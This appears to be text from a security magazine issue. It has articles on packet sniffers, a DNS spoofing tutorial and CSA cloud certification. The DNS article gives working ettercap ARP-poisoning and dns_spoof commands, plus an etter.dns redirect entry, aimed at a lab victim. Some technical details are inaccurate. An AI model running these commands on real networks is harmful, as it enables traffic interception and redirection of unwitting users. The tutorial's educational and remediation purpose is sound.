The difference between an active and a passive packet sniffing tool is that in active sniffing, the sniffing tool sends requests over the network and uses the responses to capture packets, while passive sniffing does not send requests to receive responses. It simply scans the traffic without getting noticed on the network. The places where passive sniffing comes in handy include radar systems, telecommunication and medical equipment, and many others. Another difference between the active and passive sniffing techniques is that the latter uses a host-centric approach, which means it uses hosts for sorting out data, while active sniffing uses packets. Similar to Wireshark, Network Miner also comes with an easy-to-use interface and simple installation.

NETWITNESS INVESTIGATOR
The NetWitness Investigator is a packet sniffing tool that is the result of 10 years of research and development and has been used in the most complex threat environments. The NetWitness Investigator had long been used only in critical environments, but the company has released a free version of the software, making it available to the public as well. The Investigator captures live packets from both wireless and wired network interfaces. It supports most major packet capture systems. The free version of the tool allows 25 simultaneous users to capture data up to a maximum of 1 GB.

The tool has other interesting features, such as effectively analyzing the data in the layers of networking, from users' email addresses to files, IPv6 support, full content searching, exporting the information collected in PCAP format, and others. As the number of users on the internet has grown over the years, it was important for the Internet Engineering Task Force to come up with unique IP addresses that can be used for new devices. IPv6 will replace the current-generation IPv4 protocol. The introduction of IPv6 allows an increased number of IP addresses, which helps more users communicate over the internet. This is because IPv4 addresses are only 32 bits long, supporting about 4.3 billion addresses, whereas IPv6 addresses are 128 bits long and support an enormously larger number of addresses.

With a new set of protocols used for communication, it is important for forensic tools to provide support for those protocols for seamless operation. NetWitness Investigator thus provides support for IPv6, which will be the future of all internet communication. Every new release of the tool comes with many new features that may not be available in other packet sniffing tools. NetWitness Investigator requires a certain minimum configuration for installation. The tool can be installed on a Windows operating system with at least 1 GB of RAM, one Ethernet port, a large amount of data storage, etc.

The free version of the tool supports only the Windows operating system, while the commercial version provides support for Linux as well. One important feature of the Investigator is that it does not alert administrators to problems in the network based only on known threats. Instead, it captures packets in real time, analyzes the network for differences in behavior and reports them to the forensic investigator or network administrator immediately. The commercial version of the software brings in more benefits when compared to the free version. Some of the features that are present only in the enterprise version are support for the Linux platform, remote network monitoring, informer, decoder and an automated reporting engine.
HOW PACKET ANALYZERS WORK
Packet analyzers intercept network traffic that travels through the wired and wireless network interfaces that they have access to. The structure of the network, along with how network switches and other tools are configured, decides what information can be captured. In a switched wired network, the sniffer can capture data only from the switch port it is attached to, unless port mirroring is implemented on the switch. With wireless, the packet sniffing tool can capture data from only one channel, unless there are multiple interfaces that allow data to be captured from more than one channel. RFC 5474 is a framework that is used for the selection of packets and reporting on them. It uses the PSAMP framework, which selects packets by statistical methods and exports the packets to collectors. RFC 5475 describes the various techniques of packet selection that are supported by PSAMP. These frameworks help users perform the processes seamlessly.

The data that is received initially will be in a raw format that only the software can understand. It needs to be converted to human-readable form for the forensic investigator or network administrator to interpret. The tool performs this operation in the process called conversion. The data can then be analyzed, and the necessary information can be obtained. Thus, the place where the fault is present can be identified, and

necessary actions can be taken. Normally, there are three basic types of packet sniffing: ARP sniffing, IP sniffing and MAC sniffing. In ARP sniffing, the information is transferred to the ARP cache of the hosts, and the network traffic is directed towards the administrator. In IP sniffing, the information corresponding to an IP address filter is captured. MAC sniffing is similar to IP sniffing, except that the device sniffs information packets of a particular MAC address.

COMPONENTS OF A PACKET SNIFFER
Before delving into detail on how packet sniffers work, it is important to understand the components that are part of the sniffer. The four major parts of a sniffer are the hardware, the driver, the buffer and packet analysis. Most packet sniffers work with common adapters, but some require multiple adapters, wireless adapters and others. Before installing the sniffer on the system, diagnose whether the system contains the necessary adapter for the sniffer. The next important component for a sniffer to work is the driver program. Without the driver, the sniffer cannot be installed on the system. Once the sniffer is installed, it requires a buffer, which is the storage for data captured from the network.

There are two ways in which data can be stored in the buffer. In the first method, the data is stored in the buffer until the storage space runs out, which prevents new data from being stored once there is no space left. The other method is to replace the old data with new data as and when the buffer overflows. The forensic investigator or network administrator has the option to select the buffer storage method. Also, the size of the buffer depends on the EMS memory (expanded memory specification) of the computer: the more memory the computer has, the more data can be stored in the buffer.

Packet analysis is the most essential and core part of the sniffing process, as it captures and analyzes the data from the packets. Many advanced sniffing tools have been introduced of late which allow users to replay the stored contents so that they can be edited and retransmitted based on requirements.

WORKING PRINCIPLE
The working principle of a sniffing tool is very simple. The network interfaces present in the segment will usually have a hardware address, and they can see the data that is transmitted over the physical medium. The hardware address of one network interface is designed to be unique, so it should be different from the address of any other network interface. Hence, a packet that is transmitted over the network will pass by the host machines, but will be ignored by all machines except the one the packet is destined for. However, in practice, this is not always the case, because hardware addresses can be changed in software, and virtualization technologies frequently generate hardware addresses for virtual machines from a set pool.

In IP networks, each network has a subnet mask, a network address and a broadcast address. An IP address consists of two parts, namely the network address and the host address. The subnet mask helps in separating the IP address into the network and host addresses, and the host address can be further broken down into a subnet address and a host address. The network portion is identified by performing a bitwise AND operation of the IP address with the netmask, in which the network bits are set to 1 and the host bits to 0. Any network will have two special reserved host addresses: all host bits set to 0 for the network address and all host bits set to 1 (for example, 255 in a /24 network) for the broadcast address.
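As a quick check of the bitwise AND described above, Python's standard ipaddress module can derive the network and broadcast addresses from an address and netmask. The addresses below are the illustrative lab addresses used elsewhere in this issue, not anything special.

```python
import ipaddress

# 192.168.1.19 with mask 255.255.255.0: the mask's 1-bits select the network
# portion of the address, its 0-bits the host portion.
iface = ipaddress.ip_interface("192.168.1.19/255.255.255.0")
print("Host address     :", iface.ip)                        # 192.168.1.19
print("Network address  :", iface.network.network_address)   # 192.168.1.0
print("Broadcast address:", iface.network.broadcast_address) # 192.168.1.255
```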
Subnetting helps in breaking down bigger networks into multiple smaller networks. A network address is an address that identifies a node in a network. Network addresses are unique within a network, and there can be more than one network address within any internetwork. A broadcast address is a special address that is used to transmit messages to multiple recipients. Broadcast addresses help network administrators in verifying successful data transmission over the network. The broadcast address is used by various clients, the most important of them being the Dynamic Host Configuration Protocol and the Bootstrap Protocol, which use the address to transmit server requests. When a network interface card is configured, it will respond to the target network having addresses that exist in the same network, as designated by the subnet mask and network address.

This is how packet sniffing works, and the three basic steps of packet sniffing are collection, conversion and analysis.

COLLECTION
The first step in the packet sniffing technique is the collection of raw data from the packets that travel along the network. The sniffer will switch the required network interface to promiscuous mode, which will enable

data packets from hosts in the system to be captured. When this mode is turned off, only the packets that are addressed to the particular interface will be captured. When this mode is turned on, all packets received on the interface will be captured. Packets that are received by the NIC are stored in a buffer and then processed.

It is important for the forensic investigator or network administrator to understand where to fit in a packet sniffer for it to capture packets effectively. This is called tapping the wire or getting on the wire, in which the packet sniffer is placed in the correct physical location. Placing the sniffer tool at the right position is as tough as analyzing the packets for information. Since there are hardware devices connecting a network, placing the tool at the wrong position will not fetch packets. As seen before, the network interface card should be in promiscuous mode for capturing the data that is flowing across the network. Usually, operating systems do not allow ordinary users to turn promiscuous mode on. Administrator privileges are required to enable this mode, and if that is not possible, packet sniffing cannot be carried out on that particular network.

It is much easier to sniff packets in a network that has hubs installed because, when traffic is sent over a hub, it traverses every port that is connected to the hub. Hence, once you connect the packet sniffer to an empty port of the hub, you will receive packets travelling across the hub.
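A small scapy sketch (once more an assumption on my part, and requiring administrator rights) shows both ideas from this section in practice: promiscuous-mode collection, and narrowing the capture with a filter so that only the traffic of interest is collected.

```python
from scapy.all import sniff, conf

# scapy captures in promiscuous mode by default; the setting is shown
# explicitly here only to make the point.
conf.sniff_promisc = True

# A BPF capture filter limits collection to the traffic of interest (DNS here).
packets = sniff(filter="udp port 53", count=10)
packets.summary()
```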

In the seven layer OSI model, the second layer contains MAC addresses while the third layer contains IP addresses, and both these addresses should be used in conjunction for network data transfer. The switches are present in the second layer and hence, the MAC addresses should be converted to IP ad- dresses and vice versa for data transfer. This translation process is called as address resolution protocol. Whenever a computer needs to transfer data to another computer, an ARP request is sent to the switch, which then sends ARP broadcast packet to the systems that are connected to the computer. The target computer which has the equivalent IP address responds to the request by sending out its MAC address. This information is then stored in the cache so that future connections can use this data without sending out new request. This method can easily capture the traffic across the network, and hence ARP cache poisoning is otherwise called as ARP spoofing. CONVERSION In this step, the raw data that is captured in the collection step is converted to human readable form. The converted data can only be analyzed for information that can be useful for the network administrator. The work of most of the command prompt packet sniffers stop at this point of time and the remaining work are left over to the end forensic investigator or network administrator. ANALYSIS The third and final step of packet sniffing technique is analysis in which the data present in human read- able form is analyzed to gather required information. Multiple packets are compared to obtain the behav- ior of the network. The GUI based packet sniffing tools are handy at this time as they have comparison tools as well. All these methods ensure that the right packets are captured as part of packet sniffing technique. The network problems can be analyzed, and necessary actions can be taken by the network administrators to prevent further problem in the network. The three packet sniffing tools mentioned above are used widely among the audiences around the globe. The goal of analyzing data in computer forensics is to identify and explore the digital content for pre- serving and recovering the original data that is present. There are various instances where computer fo- rensics has come in handy for network administrators. Live analysis is the most effective technique as it ensures that the encrypted file systems can also be captured and analyzed. ABOUT THE AUTHOR Eric A. Vanderburg, MBA, CISSP,Director of Information Systems and Security at JURINNOV,Technology Leader, Author, Ex- pert Witness, and Cyber Investigator. 36 www.eForensicsMag.com

UNDERSTANDING DOMAIN NAME SYSTEM
by Amit Kumar Sharma

Domain Name System (DNS) DNS spoofing, also referred to as DNS cache poisoning in the technical world, is an attack wherein junk (customized data) is added to the Domain Name System name server's cache database, which causes it to return incorrect data, thereby diverting traffic to the attacker's computer.

Let's understand this attack today. For this, we have to have an understanding of DNS first. So what we will do is understand DNS and then see what ARP and DNS spoofing attacks are.

UNDERSTANDING DNS
Any website has an identity, which is usually known as the domain name, but at the backend it is identified by an IP address. For any computer it is the IP address which matters, but who tells the computer what the IP address for a specific website is, or vice versa? It is the DNS. DNS is responsible for the translation of the domain name to an IP address. If you type an address in the address bar, believe me, a lot of things go on in the background. The DNS server translates the domain name into an IP address, and this process is called DNS resolution. RFC 1035 describes the DNS protocol, wherein it is recommended that DNS should generally operate over the UDP protocol. UDP is preferred over TCP for most DNS requests for its low overhead. You can find more details about DNS in the following RFCs:

• IETF RFC 1034: DOMAIN NAMES – CONCEPTS AND FACILITIES
• IETF RFC 1912: COMMON DNS OPERATIONAL AND CONFIGURATION ERRORS
• IETF RFC 2181: CLARIFICATIONS TO THE DNS SPECIFICATION
• IETF RFC 1035: DOMAIN NAMES – IMPLEMENTATION AND SPECIFICATION

PORT 53
Out of all the existing ports, port 53 was the one chosen to run the DNS service. Port 53 supports both TCP and UDP. TCP is given the responsibility for zone transfers of full name record databases, whereas UDP handles individual lookups.
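To see one of those individual lookups travel over UDP port 53 for yourself, the short Python sketch below hand-builds a minimal DNS query using only the standard library. The resolver address 8.8.8.8 is simply an arbitrary public resolver chosen for illustration.

```python
import socket
import struct

def build_query(name, txid=0x1234):
    # 12-byte header: ID, flags (0x0100 = standard query, recursion desired),
    # one question, no answer/authority/additional records.
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    # QNAME: each label prefixed by its length, terminated by a zero byte.
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    question = qname + struct.pack(">HH", 1, 1)   # QTYPE=A, QCLASS=IN
    return header + question

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(3)
sock.sendto(build_query("example.com"), ("8.8.8.8", 53))  # illustrative resolver
reply, _ = sock.recvfrom(512)  # 512 octets: the classic UDP DNS message limit
print(len(reply), "bytes received, transaction id",
      hex(struct.unpack(">H", reply[:2])[0]))
```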

TCP is used for handling zone transfers because of its connection-oriented nature. This nature helps DNS servers establish a connection between themselves to transfer the zone data, wherein the source and destination DNS servers are responsible for ensuring consistency, maybe by using the TCP ACK bit or some other logic, which varies. One thing that we have to keep in mind is that zone transfers are prone to giving away entire network maps.

The UDP used on port 53 is a connectionless communications protocol covering a couple of layers, including the Internet network layer, transport layer and session layer. It makes the transmission of a datagram message from one computer to an application running on another computer possible on port 53. UDP also plays an important role when it comes to the performance of DNS resolution. As it is a connectionless protocol, there is no need for it to maintain state or connections, thereby making it more efficient. DNS messages are sent over UDP, and DNS servers bind to UDP port 53. If the message length exceeds the default message size for a UDP datagram (512 octets), the first response to the message is sent with as much data as the UDP datagram will allow, and then the DNS server sets a flag indicating a truncated response. It is then the responsibility of the message sender to decide how to send the next message, i.e., over TCP or over UDP again. So if you find port 53 open in your port scanning results: bingo, you may try attacks pertaining to it.

Let's go a little deeper to understand what is meant by DNS resolving.

DNS RESOLVING
The jinx here is that we humans are good at remembering things related to alphabets, and the reverse is true of our counterpart, "the computer system," which understands numbers better. All computers are identified on the basis of their number, and it is really difficult for a human brain to remember the many numbers, "the IP addresses," of the various servers around the world that hold the data the end user wants to access. So DNS came to the rescue. It resolves names (domain names), which are fairly simple to remember, into the IP addresses of the servers. DNS can be treated as a huge database with millions of records, each conveying which IP address belongs to which domain. A trivial example will look like this:

TYPE     VALUE             NAME
A        127.0.0.1
A        192.168.1.3       Admin
A        192.168.1.5       Site.test.com
MX       0                 Site.victim.org
A        192.168.1.7       Site.example.com.
CNAME    192.168.1.11      Mywebsite.com
CNAME    192.168.1.219     Mail
CNAME    192.168.1.82      ftp
CNAME    192.168.1.19      www

Now let us consider that an end user wants to visit a website called www.searchforme.com. Let us see what steps take place at the backend before my browser shows me the webpage in the blink of an eye. "WINK" ;)

When we write www.searchforme.com in the address bar of the browser, we usually don't notice that we also have an invisible '.' at the end of this address. This powerful '.' is called the ROOT. Once we write the address, the web browser or the operating system will first determine whether it knows this domain already by looking in a local file on the computer called "hosts". This file contains domain names and their associated IP addresses. If they know it, they will return the answer but, if not, there are other

people who get involved, and the search becomes dirtier. All OSs are configured to ask a resolving name server the same question about the whereabouts of www.searchforme.com, and all resolving name servers are designed to know the location of the ROOT servers. If we have hard luck and the resolving name server still doesn't know where our website is, the ROOT server's answer is effectively a NO, together with a referral, and the resolving name server in turn queries the TLD (Top Level Domain) name server for the address. If the TLD name server doesn't have the answer for our website either, the resolving name server queries the Authoritative Name Server (ANS).

Now here is the turning point: how does this server know the address of the queried website? The answer is the domain registrar, which keeps a record of all the domains that are purchased, the details of the buyer, and the authenticity of the same. It also has a record of which authoritative name server is to be used for this specific domain. Registrars also notify the organization responsible for the top-level domain, called the registry, which in turn updates the TLD name servers for the domain. Now the resolving name server takes the response from the TLD name server, stores it in its cache, and finally reaches the authoritative name server, which resolves www.searchforme.com to its corresponding IP address. Finally, the resolving server fetches this answer and gives it back to the OS, which in turn directs the browser to reach out to the IP address. Gosh, so many things going on at a time, so fast!!!

Now, to increase the performance of all these activities, all these intermediate servers store the request and response queries in their cache to ensure that, when any similar query arrives, the server picks the answer up from the cache instead of reaching out to the registry all the time.

DNS TERMINOLOGIES
The whole of DNS can be treated as a tree structure wherein the ROOT is at the top, subdivided into domains, subdomains and zones.

DOMAIN NAME AND ZONES
The domain name space is divided into the following, though the list is non-exhaustive:

• Com: commercial organizations
• Edu: educational organizations
• Gov: government organizations
• Mil: military organizations
• Net: networking organizations
• Org: noncommercial organizations
• Aero: air-transport industry
• Biz: for business purposes
• Coop: for cooperatives
• Info: for all uses
• Museum: for museums
• Name: for individuals
• Pro: for professions

There are others as well, which are based on the country, like .ie for Ireland and .jp for Japan. And believe me, with the growth of the Internet this list is increasing tremendously and becoming more and more structured. Now all these domains are further divided into subdomains and then into zones. Below is a small demonstration of the tree structure for understanding.

Figure 1. DNS tree structure*
*: This diagram is for demonstration purposes only.
All the ones in orange are called TLDs (Top Level Domains). These domains in turn have subdomains, which are further classified into different zones.
Now, for instance, if we want the Fully Qualified Domain Name (FQDN) for the host "okies", it will be "okies.m.test.com", where m is a subdomain of the domain test.
When a query is generated for the DNS it is usually for the 'A' type record, which directly translates the domain to the IP address. The table below shows the generic queries; more parameters can be found at: http://www.iana.org/assignments/dns-parameters.
Type    Value   Description
A       1       IPv4 Address
AAAA    28      IPv6 Address
NS      2       Name Server
AXFR    252     Request for Zone Transfer
MX      15      Mail Exchange
CNAME   5       Canonical Name
Before moving to the evil part we should also concentrate on the AAAA type for IPv6 addresses. With the advent of IPv6 on the huge internet we cannot ignore its concepts and its role in DNS. AAAA ("quad A") records are the IPv6 address records, which map a host name to an IPv6 address. The AAAA record type is capable of storing a 128-bit IPv6 address, four times the 32 bits of an A record, hence the name. Similarly, an AAAA query for a specified domain name returns all the associated AAAA records in the response.
Let's get down to the evil part now.
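Before the fun starts, note that every record type in the table above can be queried directly from a shell, which makes for handy reconnaissance. A minimal sketch using the dig utility (dig ships with most Linux distributions, including BackTrack; example.com and ns1.example.com are placeholders, not targets from this article):

dig example.com A          # IPv4 address record
dig example.com AAAA       # IPv6 address record
dig example.com NS         # name servers for the domain
dig example.com MX         # mail exchangers
dig axfr example.com @ns1.example.com   # attempt a zone transfer from a specific server

If that last command succeeds, the server hands over its entire zone, which is exactly the network-map giveaway mentioned earlier.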

THE EVIL (FUN) PART :)
As we have noticed, DNS is a very crucial part of the internet and plays a very important role in resolving websites, thereby making the end user experience easy.
But this functionality can also be turned around to make all of this a bad experience. There are a number of vulnerabilities and weaknesses present in DNS and its functionality, so if we are not able to configure our DNS server properly we can be in BIG trouble. An evil mind can do a lot of tweaks and, believe me, can be very harmful if he or she is able to exploit the DNS. Vulnerabilities present with respect to DNS include:
• DNS cache poisoning
• Denial of service attacks (which work against nearly everything)
• Unauthorized zone transfers
• Buffer overflows
• Hijacking
• DNS misconfiguration
• Spoofing the DNS response
We will discuss cache poisoning and spoofing as part of this article.
Figure 2. A typical DNS cache on a Windows machine
DNS SPOOFING
DNS spoofing is said to happen when a DNS server starts accepting and using incorrect information from a host that has no legitimate authority to provide it. During this attack, malicious data is successfully placed in the cache of the server. This misleads the resolver, and the user gets redirected to a wrong website, possibly one hosted by a malicious user, who can hijack the victim without the victim ever realizing that something wrong has happened.
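Since the poisoned entries end up in a local cache like the one shown in Figure 2, it helps to know how to inspect and clear that cache on the victim side. On a Windows machine the standard commands are:

ipconfig /displaydns    (dumps the current resolver cache, as in Figure 2)
ipconfig /flushdns      (clears the cache, discarding any poisoned entries)

These are stock Windows commands; on Linux, flushing the cache depends on which caching service, if any, is running.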

DNS spoofing can be carried out in a number of ways:
• DNS cache poisoning
• Breaking the platform (really tough)
• Spoofing the DNS response
Let's see how we can spoof the DNS through cache poisoning.
DNS CACHE AND POISONING
When we type a URL in the address bar, we are actually sending a DNS query. A record of these queries is also kept in a temporary storage location on your computer called the DNS cache. The resolver always checks this cache before querying any of the DNS servers, and if a record is found it uses that instead of querying the server, which makes the lookup faster and decreases network traffic as well.
So our target is this cache. If we succeed in poisoning the cache through a flaw in the DNS software, and if the server does not correctly validate DNS responses to ensure they come from an authentic source, the server will end up caching the incorrect entries locally and serving them to other users that make the same request (see Figure 2).
Get your hacker hat (of course the white one) and ready your weapon. For me the weapon is my BackTrack machine, which I have named ARCHIE (192.168.1.7).
Ettercap is a very famous tool and is the one we are going to use here; it is also available for Windows. It has various uses, but for this exercise we will use it to spoof DNS. We are choosing ettercap for two reasons: one, it is awesomely user friendly and easy to use, and two, its dns_spoof plugin comes in very handy.
Figure 3. Attack perspective
Step 1: Victim sends DNS query
Step 2: Fake DNS reply
Step 3: Victim unknowingly starts communicating with the attacker
Below is a sample diagram of the attacker and the victim machine.
• Our attacker machine: 192.168.1.7
• Our victim machine: a Windows machine, 192.168.1.19

Figure 4. Attacker and the victim machine
So what we will do: first we perform ARP spoofing, then we poison the cache, and then we access the poisoned cache and verify the results.
One prerequisite you should cross-check: whether IP forwarding is enabled, by inspecting the file
/proc/sys/net/ipv4/ip_forward
If the value is '0', as it is here, you need to change it to '1' with the command
echo 1 > /proc/sys/net/ipv4/ip_forward
Next, locate the etter.dns file with the command
locate etter.dns
You can use the Linux vi editor or nano for editing purposes. Now edit the file in its location:
vi /usr/local/share/ettercap/etter.dns
Add an entry with *.mywebsite.com as the name, 'A' as the type, and 192.168.1.7, the address of the attacker's machine (my BackTrack machine in this case), as the value. This ensures that any traffic towards *.mywebsite.com will be redirected to my machine; the entry is shown below.
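For illustration, the line added to etter.dns would look something like this, following ettercap's name/type/address layout (mywebsite.com and 192.168.1.7 are simply the names and addresses used in this exercise):

*.mywebsite.com A 192.168.1.7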

Now consider the victim machine, with IP address 192.168.1.19 and Windows 7 as its operating system. Let us see the result of pinging our "www.mywebsite.com". The ping gives us the IP address 64.120.230.71, with the behavior as expected; screenshot below.
Figure 5. Victim machine before the attack
Now let us perform the attack. The ettercap command is
ettercap -T -q -M arp:remote -P dns_spoof //
Here -T runs ettercap in text mode, -q keeps the output quiet, -M arp:remote launches the ARP man-in-the-middle attack, -P dns_spoof loads the DNS spoofing plugin, and the // target specification covers every host on the network. This will actually launch an ARP poisoning attack against the entire network we are connected to, so please be cautious before trying it.
Once the attack starts, we go back to our victim machine and ping the website again to see whether our attack is working or not.

Figure 6. Victim machine after the attack
Bingo, there it is: the attack worked. We were able to spoof DNS and redirect all the traffic headed for www.mywebsite.com to our IP address. From here it depends on the attacker how much damage he wants to cause, from getting a Metasploit Meterpreter shell to stealing data, and so on.
To explore more of the tool you can use the following command:
ettercap -h
The same thing can be done via ettercap's GUI as well, which is very easy to use; below are the steps. For the GUI, either download it directly from the website or, if you are using BackTrack, the following command comes in handy.

ettercap -G
This will launch the ettercap GUI. Below is the interface:
Figure 7. Ettercap GUI interface
Next you have to select the interface, in this case "eth0":
Figure 8. Selecting your network interface
Once you have selected OK, the plugins load and are ready to use. Next we open the HOSTS menu and click on Scan HOST.

Figure 9. Host menu item
On scanning, ettercap finds all the hosts that are alive. We can now select from this list of hosts and add our target, in this case 192.168.1.19, to the target list. Next we select the MITM menu item and click on ARP poisoning.
Figure 10. Performing ARP poisoning
The window below pops up; click OK.
Figure 11. ARP poisoning
Once you click OK, the tool performs the attack by sending the ARP packets. To launch the DNS spoof attack:

Go to the PLUGINS menu item and scroll down to the dns_spoof plugin. Double-clicking it launches the plugin and spoofs the DNS.
Figure 12. dns_spoof plugin
REMEDIATION
If you look at the basic working of DNS queries, the remediation is right in front of your eyes. These attacks are not effective if the attacker cannot send the initial query identifying a domain, so you can limit access to the computers you rely on or that genuinely need it. Performing end-to-end validation once the connection is established can verify the authenticity of the data. One very effective measure is randomizing the source port of DNS requests; another is upgrading your DNS servers to build in security with DNSSEC. Configure your name servers properly, keeping their security in mind, and audit the servers regularly for security flaws, implementing patches as and when required, to stay safe.
WORD OF CAUTION
Do not use this attack on a live network. Set up a small lab environment and perform the attack only for educational purposes, to learn the concepts.
ABOUT THE AUTHOR
Amit Kumar Sharma, commonly known as AKS-44, has a B.E. in EC and works in Information Security for a reputed firm. He is passionate about security and spends his time learning and researching in the wild.

CSA CERTIFICATION OFFERS A SIMPLE, COST-EFFECTIVE WAY TO EVALUATE AND COMPARE CLOUD PROVIDERS
by John DiMaria
Technological developments, constricted budgets, and the need for flexible access have led to an increase in business demand for cloud computing. Many organizations are wary of cloud services, however, due to apprehensions around security issues. Ernst & Young conducted a survey of C-level leaders in 52 countries which showed a unified concern over the accelerating rate at which companies are moving information to the cloud and the subsequent demise of physical boundaries and infrastructure.
The widespread adoption of mobile devices only serves to accelerate this trend. Now employees, customers, suppliers, and other stakeholders can access data wherever and whenever they wish, intensifying concerns surrounding security and privacy (Ernst & Young 2011 Global Information Security Survey, Out of the Cloud into the fog, 2011).
Companies are moving from traditional IT staffing and outsourcing contracts to cloud service providers, forever altering their business models and IT functions, with the potential to greatly reduce or even eliminate in-house IT operations. Security and quality must be of the highest concern, focused on the most important assets any company has: customers and stakeholders.
In 2012, BSI, a leading certification body and business improvement solutions provider, teamed up with the Cloud Security Alliance (CSA), an independent not-for-profit coalition comprised of industry leaders, associations, and information security experts. Together they identified serious gaps within the IT ecosystem that inhibit market adoption of secure and reliable cloud services. They found that businesses did not have simple, cost-effective ways to evaluate and compare their providers' resilience, data protection capabilities and service portability.
CSA and BSI recognized that there was no single program, regulation or other compliance regime that would meet the future demands of IT as well as address the risk of adding complexity to the already overloaded and costly

compliance landscape. The rise of the cloud as a global computing utility, however, demands better harmonization of compliance concerns and business needs.
The Ernst & Young survey supported their findings, revealing that while companies are trying to respond, they fully admit that the information security budget may not be effectively applied. Just over half of companies indicated that their security functions do not meet the needs of the organization. Most admit to a heavy reliance on trust when it comes to outsourcing IT services, but what they need is validation, verification, and certification. The vast majority of companies are ready to mandate a "standard of care" and "due diligence", with almost ninety percent in favor of external certification and forty-five percent insisting it be based on an agreed-upon, internationally accepted standard.
While there was already a self-declaration process available through the CSA Security, Trust and Assurance Registry (STAR), it was evident that without a formal validation and verification process complying with international standards, self-declaration would not fill the need for transparency and trust. There were also questions about whether the scope of self-declaration was fit for purpose, as there was no real measurement of how the processes were to be managed to ensure optimization (maturity).
BSI developed a process that would be user friendly, allow third-party validation and verification, and provide a formal certification that would be internationally accepted. After many discussions with users, industry experts, and service providers, it was clear that any "new" standard would be overkill and would just add to the confusion of the plethora of standards already in existence. A new standard would also have to build credibility over the long term, thus inhibiting adoption.
ISO/IEC 27001 – THE FOUNDATION FOR STAR CERTIFICATION
The gold standard since 2005, ISO/IEC 27001 is the most widely accepted, internationally endorsed standard for information security in the world. In some countries, like Japan, ISO/IEC 27001 has been mandated by the government, particularly for publicly traded companies, and over the years the requirement has cascaded down through the supply chain. Many other countries are jumping on board by requiring tighter controls over information security across a variety of industries, as well as their critical suppliers and extended business partners.
Companies also realize they must be leaner, asking more of each employee while settling for smaller budgets. Moving to the cloud is in part a reaction to increased IT costs, as it provides more IT services for a smaller investment. Unfortunately, it comes with increased risk, and companies are looking for a globally accepted standard and third-party verification that can serve as a screening process for suppliers, particularly Cloud Service Providers.
ISO 27001 has a long history going back to 1995, when BS 7799 was introduced. It has been improved over the years, taking into consideration the ever-changing compliance and regulatory landscape for information security.

